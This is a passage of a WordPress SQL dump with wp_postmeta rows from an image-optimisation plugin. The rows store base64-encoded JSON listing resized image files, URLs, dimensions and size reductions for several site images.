hhbmUtTWlzc2xlLTgwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNjg3LCJpZCI6MTk0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtNzY4eDU3Ni5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjU3NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtNzY4eDU3Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtNzY4eDU3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA2OTAsImlkIjoxOTQyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS0xNjAweDEyMDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtMTYwMHgxMjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS0xNjAweDEyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNjk0LCJpZCI6MTk0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA2OTcsImlkIjoxOTQyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDY5OSwiaWQiOjE5NDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNzAxLCJpZCI6MTk0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9VcmV0aGFuZS1NaXNzbGUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA3MDQsImlkIjoxOTQyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVXJldGhhbmUtTWlzc2xlLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNzA3LCJpZCI6MTk0Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS00NTB4MzM4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS00NTB4MzM4LmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzM4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1VyZXRoYW5lLU1pc3NsZS00NTB4MzM4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDcwOSwiaWQiOjE5NDJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28948, 1941, 'wpfc_optimisation_reduction', '15621'); 
INSERT INTO `wp_postmeta` VALUES (28949, 1941, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmcuanBnIiwid2lkdGgiOjQ3NTIsImhlaWdodCI6MzE2OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MDcxNCwiaWQiOiIxOTQxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaWxpY29uZS1jb2F0aW5nLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU4MCwidGltZSI6MTQ4MzU1MDcxNywiaWQiOjE5NDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaWxpY29uZS1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNzgwLCJ0aW1lIjoxNDgzNTUwNzIxLCJpZCI6MTk0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaWxpY29uZS1jb2F0aW5nLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE1NTAsInRpbWUiOjE0ODM1NTA3MjYsImlkIjoxOTQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo4MjA0LCJ0aW1lIjoxNDgzNTUwNzMxLCJpZCI6MTk0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaWxpY29uZS1jb2F0aW5nLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUwNCwidGltZSI6MTQ4MzU1MDczNCwiaWQiOjE5NDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaWxpY29uZS1jb2F0aW5nLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MjgsInRpbWUiOjE0ODM1NTA3MzcsImlkIjoxOTQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaWxpY29uZS1jb2F0aW5nLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDM4LCJ0aW1lIjoxNDgzNTUwNzQxLCJpZCI6MTk0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaWxpY29uZS1jb2F0aW5nLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwNzIsInRpbWUiOjE0ODM1NTA3NDQsImlkIjoxOTQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaWxpY29uZS1jb2F0aW5nLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1MDQsInRpbWUiOjE0ODM1NTA3NDcsImlkIjoxOTQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2lsaWNvbmUtY29hdGluZy00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NpbGljb25lLWNvYXRpbmctNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaWxpY29uZS1jb2F0aW5nLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo1NjEsInRpbWUiOjE0ODM1NTA3NTEsImlkIjoxOTQxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28950, 1940, 'wpfc_optimisation_reduction', '15577'); 
INSERT INTO `wp_postmeta` VALUES (28951, 1940, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLmpwZyIsIndpZHRoIjo2MDAwLCJoZWlnaHQiOjM1MTAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTA3NTUsImlkIjoiMTk0MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3ODEsInRpbWUiOjE0ODM1NTA3NTksImlkIjoxOTQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185NzQwMTczMS04MDB4NDY4LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185NzQwMTczMS04MDB4NDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185NzQwMTczMS04MDB4NDY4LmpwZyIsInJlZHVjdGlvbiI6MTg2NiwidGltZSI6MTQ4MzU1MDc2MiwiaWQiOjE5NDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTc2OHg0NDkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0NDksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTc2OHg0NDkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTc2OHg0NDkuanBnIiwicmVkdWN0aW9uIjoxNzM5LCJ0aW1lIjoxNDgzNTUwNzY2LCJpZCI6MTk0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMTYwMHg5MzYuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6OTM2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185NzQwMTczMS0xNjAweDkzNi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMTYwMHg5MzYuanBnIiwicmVkdWN0aW9uIjo2ODIyLCJ0aW1lIjoxNDgzNTUwNzcwLCJpZCI6MTk0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfOTc0MDE3MzEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU1OSwidGltZSI6MTQ4MzU1MDc3MywiaWQiOjE5NDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzk3NDAxNzMxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0OTIsInRpbWUiOjE0ODM1NTA3NzcsImlkIjoxOTQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185NzQwMTczMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja185NzQwMTczMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaH